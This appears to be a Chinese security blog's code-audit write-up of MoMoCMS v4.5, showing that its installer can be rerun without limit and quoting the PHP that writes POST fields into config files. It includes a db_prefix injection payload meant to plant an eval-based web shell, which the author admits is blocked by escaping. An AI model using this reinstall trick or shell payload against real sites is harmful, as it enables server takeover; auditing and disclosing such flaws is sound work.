记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

MoMoCmsV4.5无限重装以及Getshell

2015-01-30 11:50

MoMoCmsV4.5无限重装以及Getshell,首发于安全盒子

Team:安全盒子(www.secbox.cn)&&听潮社区(ListenTide)

Author:Sion

Site:MoMoCms

0x01:
Install安装文件
安装文件使用required获取

图片1

图片2

提交到install_do.php

图片3

启动转义
然后将之前获取的值替换成post获取然后给db
写入database.php
下面的也是一样的意思

图片4

打开momocms.sql
用;换行来分割
最后执行set sql_mode啥的
最后就执行插入添加管理账号密码的sql语句

图片5
没有任何判断,没有生成lock文件啥的。
所以可以无限制重装

 

 

0x02:Getshell

$db1=file_get_contents("../database.php");
$db1=str_replace("{DB_HOST}",$_POST['db_host'],$db1);
$db1=str_replace("{DB_USER}",$_POST['db_user'],$db1);
$db1=str_replace("{DB_PSW}",$_POST['db_psw'],$db1);
$db1=str_replace("{DB_NAME}",$_POST['db_name'],$db1);
$db1=str_replace("{DB_PREFIX}",$_POST['db_prefix'],$db1);
$db1=str_replace("{URL}",$_POST['url'],$db1);
file_put_contents("../database.php",$db1);

$db2=file_get_contents("../admin/database.php");
$db2=str_replace("{DB_HOST}",$_POST['db_host'],$db2);
$db2=str_replace("{DB_USER}",$_POST['db_user'],$db2);
$db2=str_replace("{DB_PSW}",$_POST['db_psw'],$db2);
$db2=str_replace("{DB_NAME}",$_POST['db_name'],$db2);
$db2=str_replace("{DB_PREFIX}",$_POST['db_prefix'],$db2);
$db2=str_replace("{URL}",$_POST['url'],$db2);
file_put_contents("../admin/database.php",$db2);

$dbm=file_get_contents("../m/database.php");
$dbm=str_replace("{DB_HOST}",$_POST['db_host'],$dbm);
$dbm=str_replace("{DB_USER}",$_POST['db_user'],$dbm);
$dbm=str_replace("{DB_PSW}",$_POST['db_psw'],$dbm);
$dbm=str_replace("{DB_NAME}",$_POST['db_name'],$dbm);
$dbm=str_replace("{DB_PREFIX}",$_POST['db_prefix'],$dbm);
$dbm=str_replace("{URL}",$_POST['url'],$dbm);
$dbm=str_replace("{URL_M}",$_POST['url']."/m",$dbm);
file_put_contents("../m/database.php",$dbm);

我们可以看到,它会将配置文件写入当前的database.php和M目录下和admin目录下

$db = new PDO("mysql:host=".$_POST['db_host'].";dbname=".$_POST['db_name'], $_POST['db_user'], $_POST['db_psw']); //初始化一个PDO对象

这一段,能看到将dbhost、dbport、dbname、dbuser、dbpwd写入数据库,所以咯,不能乱写,只能写dbprefix和url
所以构造

dbprefix=sb_';[url=home.php?mod=space&uid=5528]@eval[/url] ($_POST[sion]);$sion='

然后我就会告诉你它转义了。。。。。还是在后台截断什么吧,getshell还是算了,我心痛

转载MoMoCmsV4.5无限重装以及Getshell请注明出自:安全盒子


知识来源: www.secbox.cn/hacker/daimashenji/1075.html

阅读:144656 | 评论:1 | 标签:0day/Exp 代码审计 cms

想收藏或者和大家分享这篇好文章→复制链接地址

“MoMoCmsV4.5无限重装以及Getshell”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

ADS

标签云